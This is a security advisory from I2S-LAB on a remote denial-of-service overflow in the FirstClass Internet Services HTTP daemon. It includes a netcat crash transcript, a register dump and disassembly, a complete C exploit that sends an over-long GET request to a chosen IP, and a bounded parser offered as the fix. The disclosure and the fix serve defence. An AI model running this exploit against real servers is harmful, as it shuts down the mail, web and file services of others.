Security advisory about an overflow in HTTP daemons on several servers.

###########################################################################################
~ I2S-LAB Security Advisory ~
###########################################################################################
http://www.I2S-LAB.com
Date : 25/09/2003
Affected systems : FirstClass Build 133 (SP3) HTTP Daemon and prior versions
Vendor : http://www.centrinity.com
Issue : Attackers can remotely shut down Internet Services (HTTP/FTP/SMTP/POP3/IMAP4/...)

Description
___________
FirstClass is a combination of solutions that lets a company set up a reliable intranet
by integrating powerful Internet services, including most of the common communication protocols
(SMTP/ HTTP/ FTP/ ...).

Technical Details
_________________
The FirstClass "Internet Services" plug-in has a remote DoS vulnerability in the HTTP daemon, which can be triggered
by a stack overflow that overwrites a data pointer.
By sending a request on port 80 such as: GET / HTTP/1.1[A x 246]
FirstClass Internet Services will raise an access violation by trying to read, somewhere on the
stack, data located outside the address space allocated to the process.

D:\netcat>nc -vv 10.0.0.5 80
I2S-w2k [10.0.0.5] 80 (http) open
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAADDDD
sent 262, rcvd 0: NOTSOCK
D:\netcat>
*** Exception in program C:\FCServer\fcintsrv.exe
Location: CList::GetNext+0000003C (004F882C)
Error: Access violation
Cause: Read attempted at <Unknown> (4444444C)
Registers:
EAX=01F2415C EBX=00C802F0 ECX=44444444 <-- pointer is overwritten here
EDX=01F2415C ESI=00000000 EDI=00000000
EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206
CS=0000001B DS=00000023 SS=00000023
ES=00000023 FS=00000038 GS=00000000

:004F881D 8B55FC mov edx, dword ptr [ebp-04]
:004F8820 837A0400 cmp dword ptr [edx+04], 00000000
:004F8824 740B je 004F8831
:004F8826 8B45FC mov eax, dword ptr [ebp-04]
:004F8829 8B4804 mov ecx, dword ptr [eax+04]
:004F882C 8B4108 mov eax, dword ptr [ecx+08] <-- crash occurs
:004F882F EB02 jmp 004F8833

Exploit
_______

/*******************************************
 * FirstClass Internet Services Remote DoS *
 *******************************************
 *
 * discovered & coded by I2S-LAB
 * --------------------------------------------
 * This exploit uses a ptr overflow to remotely
 * shutdown the Internet Services of FirstClass.
 *
 * CONTACT
 * _______
 * Fred CHAVEROT : fred[at]I2S-LAB.com
 * Aurélien BOUDOUX : aurelien[at]I2S-LAB.com
 * URL : http://www.I2S-LaB.com
 *******************************************/

#include <stdio.h>      /* printf/puts; missing from the original listing */
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")

/* Bytes appended after the request line: 242 x 'A' followed by "DDDD" */
#define PerfectOverwrite 246

int main (int argc, char *argv[])
{
    SOCKET sock1;
    SOCKADDR_IN sin;
    char *sav;
    WSADATA wsadata;
    WORD wVersionRequested = MAKEWORD (2,0);

    printf ("- FirstClass Internet Services Remote DoS -\n\n"
            "Discovered & coded by I2S-LAB\n"
            "http://www.I2S-LaB.com\n\n");

    if (argc < 2)
    {
        printf ("Usage : %s <IP Address>\n", argv[0]);
        ExitProcess (0);
    }

    if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);

    /* LPTR returns zero-filled memory, so lstrcat starts from an empty string */
    if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
    {
        printf ("Error ! cannot allocate enough memory.\n");
        ExitProcess (0);
    }

    /* Request line, then the filler, then the 4 bytes that end up in the pointer (see ECX above) */
    lstrcat (sav, "GET / HTTP/1.1");
    memset (&sav[14], 'A', PerfectOverwrite - 4);
    lstrcat (sav,"DDDD\r\n\r\n");

    sin.sin_family = AF_INET;
    sin.sin_port = htons (80);
    if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
    {
        printf ("Incorrect IP Address : %s\n", argv[1]);
        ExitProcess(0);
    }

    sock1 = socket (AF_INET, SOCK_STREAM, 0);
    printf ("\nconnecting to %s...", argv[1]);
    if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
        printf ("connection failed!\n");
    else
    {
        printf ("ok!\nSending crafted request...");
        /* 14 bytes of request line + 246 filler bytes + 4 bytes of CRLFCRLF = PerfectOverwrite + 18 */
        send (sock1,sav, PerfectOverwrite + 18,0);
        puts ("ok!");
    }

    closesocket (sock1);
    WSACleanup ();
    return 0;
}

Solution
________
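The crash shown in the technical details is the classic result of copying an unbounded request line into a fixed-size stack buffer, so that bytes past the end of the buffer land in an adjacent pointer. The following is an added example written for this page, not FirstClass code and not the vendor's fix: a request-line parser in C that enforces a length ceiling before it copies anything, bounds each token separately, and maps every rejection to an HTTP status. The limits MAX_REQUEST_LINE and MAX_TOKEN, the function names, and the sample inputs are assumptions chosen for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_LINE 256   /* hypothetical ceiling for the whole line, checked before any copy */
#define MAX_TOKEN        128   /* hypothetical ceiling for each of method, target, version */

enum parse_status { PARSE_OK = 0, PARSE_TOO_LONG, PARSE_MALFORMED, PARSE_BAD_VERSION };

struct request_line {
    char method[MAX_TOKEN];
    char target[MAX_TOKEN];
    char version[MAX_TOKEN];
};

/* Copy len bytes into dst (capacity max) and NUL-terminate; refuse empty or oversized tokens. */
static int copy_token(char *dst, size_t max, const char *start, size_t len)
{
    if (len == 0 || len >= max)
        return -1;
    memcpy(dst, start, len);
    dst[len] = '\0';
    return 0;
}

/* Parse "METHOD SP TARGET SP VERSION CRLF" from a buffer of rawlen received bytes.
 * raw need not be NUL-terminated; nothing beyond rawlen is ever read. */
enum parse_status parse_request_line(const char *raw, size_t rawlen, struct request_line *out)
{
    /* The length check comes first: an over-long line is rejected before it is touched. */
    if (rawlen > MAX_REQUEST_LINE)
        return PARSE_TOO_LONG;

    const char *eol = memchr(raw, '\n', rawlen);
    if (eol == NULL)
        return PARSE_MALFORMED;                 /* no terminator within the limit */
    size_t linelen = (size_t)(eol - raw);
    if (linelen > 0 && raw[linelen - 1] == '\r')
        linelen--;

    const char *sp1 = memchr(raw, ' ', linelen);
    if (sp1 == NULL)
        return PARSE_MALFORMED;
    const char *sp2 = memchr(sp1 + 1, ' ', linelen - (size_t)(sp1 + 1 - raw));
    if (sp2 == NULL)
        return PARSE_MALFORMED;

    if (copy_token(out->method, sizeof out->method, raw, (size_t)(sp1 - raw)) != 0 ||
        copy_token(out->target, sizeof out->target, sp1 + 1, (size_t)(sp2 - sp1 - 1)) != 0 ||
        copy_token(out->version, sizeof out->version, sp2 + 1, linelen - (size_t)(sp2 + 1 - raw)) != 0)
        return PARSE_MALFORMED;

    if (strncmp(out->version, "HTTP/", 5) != 0)
        return PARSE_BAD_VERSION;
    return PARSE_OK;
}

/* Status code a server would answer with for each parse outcome. */
int http_status_for(enum parse_status s)
{
    switch (s) {
    case PARSE_OK:          return 200;
    case PARSE_TOO_LONG:    return 414;   /* Request-URI Too Long */
    case PARSE_BAD_VERSION: return 505;   /* HTTP Version Not Supported */
    default:                return 400;   /* Bad Request */
    }
}

int main(void)
{
    /* Constructed sample inputs: one normal request line and one over-long line of filler. */
    const char normal[] = "GET /index.html HTTP/1.1\r\n";
    char overlong[300];
    struct request_line rl;
    enum parse_status st;

    st = parse_request_line(normal, sizeof normal - 1, &rl);
    printf("normal:   status %d -> HTTP %d (%s %s %s)\n",
           st, http_status_for(st), rl.method, rl.target, rl.version);

    memset(overlong, 'A', sizeof overlong);
    st = parse_request_line(overlong, sizeof overlong, &rl);
    printf("overlong: status %d -> HTTP %d\n", st, http_status_for(st));
    return 0;
}
```

The ordering matters: the length test runs on the received byte count before any memchr or memcpy, so a line of the shape shown in the netcat transcript (request line plus 246 trailing bytes) is refused with 414 without ever reaching a buffer. Tokens are bounded a second time in copy_token, so a line that fits the overall limit but carries an oversized single field is still refused rather than truncated.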